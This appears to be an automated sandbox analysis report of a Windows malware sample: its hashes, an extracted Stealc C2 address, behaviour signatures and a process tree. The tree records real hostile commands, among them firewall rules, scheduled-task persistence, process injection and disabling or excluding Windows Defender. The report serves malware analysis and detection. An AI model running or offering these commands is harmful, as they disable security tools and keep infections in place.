Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-04-2024 08:07

Errors

Reason
Machine shutdown

General

  • Target

    8408dcfb8751f971ab0f3f4ec16abc52586a90a507ac8e6be0b02219980758f3.exe

  • Size

    389KB

  • MD5

    a3d607292f456d782622bdf10ddcaa72

  • SHA1

    e21e9ec6bc6234993591cd2034a019af59e98071

  • SHA256

    8408dcfb8751f971ab0f3f4ec16abc52586a90a507ac8e6be0b02219980758f3

  • SHA512

    147401e381e5ec0a539cc7272721fd0893c6a603b64217539cef925579c32b9be6cd981b68cfbf6a5f484dddc50ddc9c3195172ce00524301206cbb6786df76e

  • SSDEEP

    6144:hjuZSWCTeEVTAHT6HPqHr3aUb/memWBFU/iBHZGI3XCjA77lyJkJZVKM:hjtXVTAHyc3f/U6OiJZhXCsdyJ6ZVKM

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.62

Attributes
  • url_path

    /902e53a07830e030.php

Signatures

  • Detect ZGRat V1 3 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 19 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 14 IoCs
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 27 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 50 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 30 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\8408dcfb8751f971ab0f3f4ec16abc52586a90a507ac8e6be0b02219980758f3.exe
    "C:\Users\Admin\AppData\Local\Temp\8408dcfb8751f971ab0f3f4ec16abc52586a90a507ac8e6be0b02219980758f3.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3164
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1752
      • C:\Users\Admin\Pictures\KAP0jY5A32A1zUt60qBioyeV.exe
        "C:\Users\Admin\Pictures\KAP0jY5A32A1zUt60qBioyeV.exe"
        3⤵
        • Blocklisted process makes network request
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4676
        • C:\Users\Admin\AppData\Local\Temp\u3lw.0.exe
          "C:\Users\Admin\AppData\Local\Temp\u3lw.0.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1092
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 3452
            5⤵
            • Program crash
            PID:4972
        • C:\Users\Admin\AppData\Local\Temp\u3lw.2\run.exe
          "C:\Users\Admin\AppData\Local\Temp\u3lw.2\run.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1756
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            PID:1904
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:2368
        • C:\Users\Admin\AppData\Local\Temp\u3lw.3.exe
          "C:\Users\Admin\AppData\Local\Temp\u3lw.3.exe"
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4576
          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5200
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1616
          4⤵
          • Program crash
          PID:5000
      • C:\Users\Admin\Pictures\h3FprIEEvN8UQh02rwCZU0nz.exe
        "C:\Users\Admin\Pictures\h3FprIEEvN8UQh02rwCZU0nz.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2328
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3624
        • C:\Users\Admin\Pictures\h3FprIEEvN8UQh02rwCZU0nz.exe
          "C:\Users\Admin\Pictures\h3FprIEEvN8UQh02rwCZU0nz.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1376
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            5⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2344
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:4596
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:4944
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2976
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4112
        • C:\Users\Admin\Pictures\Ipi5UVIbbH3bHE835OavRFqb.exe
          "C:\Users\Admin\Pictures\Ipi5UVIbbH3bHE835OavRFqb.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3384
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1500
          • C:\Users\Admin\Pictures\Ipi5UVIbbH3bHE835OavRFqb.exe
            "C:\Users\Admin\Pictures\Ipi5UVIbbH3bHE835OavRFqb.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2152
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1552
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3912
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:3264
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2748
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1660
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Manipulates WinMonFS driver.
              • Drops file in Windows directory
              • Suspicious use of AdjustPrivilegeToken
              PID:5904
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                6⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:6028
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                6⤵
                • Creates scheduled task(s)
                PID:5396
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /delete /tn ScheduledUpdate /f
                6⤵
                  PID:5320
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5324
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5828
                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                  6⤵
                  • Executes dropped EXE
                  PID:3820
                • C:\Windows\SYSTEM32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Creates scheduled task(s)
                  PID:5632
                • C:\Windows\windefender.exe
                  "C:\Windows\windefender.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:6136
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    7⤵
                      PID:5584
                      • C:\Windows\SysWOW64\sc.exe
                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                        8⤵
                        • Launches sc.exe
                        PID:5840
            • C:\Users\Admin\Pictures\1hoG7H7lB36CVV1BgOeinuFx.exe
              "C:\Users\Admin\Pictures\1hoG7H7lB36CVV1BgOeinuFx.exe"
              3⤵
              • Modifies firewall policy service
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Drops file in System32 directory
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:1940
            • C:\Users\Admin\Pictures\KnYFJMZFrJwhDSVbCZvkZ04Z.exe
              "C:\Users\Admin\Pictures\KnYFJMZFrJwhDSVbCZvkZ04Z.exe" --silent --allusers=0
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Enumerates connected drives
              • Modifies system certificate store
              • Suspicious use of WriteProcessMemory
              PID:3992
              • C:\Users\Admin\Pictures\KnYFJMZFrJwhDSVbCZvkZ04Z.exe
                C:\Users\Admin\Pictures\KnYFJMZFrJwhDSVbCZvkZ04Z.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f01e1d0,0x6f01e1dc,0x6f01e1e8
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3436
              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\KnYFJMZFrJwhDSVbCZvkZ04Z.exe
                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\KnYFJMZFrJwhDSVbCZvkZ04Z.exe" --version
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3600
              • C:\Users\Admin\Pictures\KnYFJMZFrJwhDSVbCZvkZ04Z.exe
                "C:\Users\Admin\Pictures\KnYFJMZFrJwhDSVbCZvkZ04Z.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3992 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428080808" --session-guid=3e63c896-8fec-4a34-a34b-0e6e45d9c5dd --server-tracking-blob="M2E4YThmM2E5MTcyYjlmODU5NjFhNGFiZjQ5NjYyNWRiZjBkZjFhMjY0NTVlM2IyMGQ5ZWNmY2VmNzcyYTRkNjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MjkxNjgyLjM4NTgiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMTUxOWM3MzMtNjZjZC00MjQzLTkzNWUtMTgzM2MxMjUwNjc0In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5C04000000000000
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Enumerates connected drives
                • Suspicious use of WriteProcessMemory
                PID:900
                • C:\Users\Admin\Pictures\KnYFJMZFrJwhDSVbCZvkZ04Z.exe
                  C:\Users\Admin\Pictures\KnYFJMZFrJwhDSVbCZvkZ04Z.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6d99e1d0,0x6d99e1dc,0x6d99e1e8
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:4956
              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280808081\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280808081\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
                4⤵
                • Executes dropped EXE
                PID:2912
              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280808081\assistant\assistant_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280808081\assistant\assistant_installer.exe" --version
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:5528
                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280808081\assistant\assistant_installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280808081\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x1076038,0x1076044,0x1076050
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:5568
            • C:\Users\Admin\Pictures\bgIfUIakxFkmfw0tsEqRJ830.exe
              "C:\Users\Admin\Pictures\bgIfUIakxFkmfw0tsEqRJ830.exe"
              3⤵
              • Executes dropped EXE
              PID:4852
              • C:\Users\Admin\AppData\Local\Temp\7zSCBCC.tmp\Install.exe
                .\Install.exe /WkfdidVYT "385118" /S
                4⤵
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Enumerates system info in registry
                PID:3968
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                    PID:3368
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                      6⤵
                        PID:5124
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          7⤵
                            PID:5140
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              8⤵
                                PID:5152
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                            6⤵
                              PID:5172
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                7⤵
                                  PID:5184
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    8⤵
                                      PID:5200
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                  6⤵
                                    PID:5220
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      7⤵
                                        PID:5232
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          8⤵
                                            PID:5248
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                        6⤵
                                          PID:5268
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                            7⤵
                                              PID:5280
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                8⤵
                                                  PID:5296
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                              6⤵
                                                PID:5316
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                  7⤵
                                                    PID:5328
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      8⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5344
                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                        9⤵
                                                          PID:5728
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                  5⤵
                                                    PID:5292
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      6⤵
                                                        PID:2060
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                          7⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5472
                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            8⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4292
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 08:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSCBCC.tmp\Install.exe\" Wt /poodidzktL 385118 /S" /V1 /F
                                                      5⤵
                                                      • Drops file in Windows directory
                                                      • Creates scheduled task(s)
                                                      PID:3524
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
                                                      5⤵
                                                        PID:5144
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                          6⤵
                                                            PID:4232
                                                            • \??\c:\windows\SysWOW64\schtasks.exe
                                                              schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                              7⤵
                                                                PID:1652
                                                      • C:\Users\Admin\Pictures\EGsbwn0kIoxSzAAbsfujmtRF.exe
                                                        "C:\Users\Admin\Pictures\EGsbwn0kIoxSzAAbsfujmtRF.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:5476
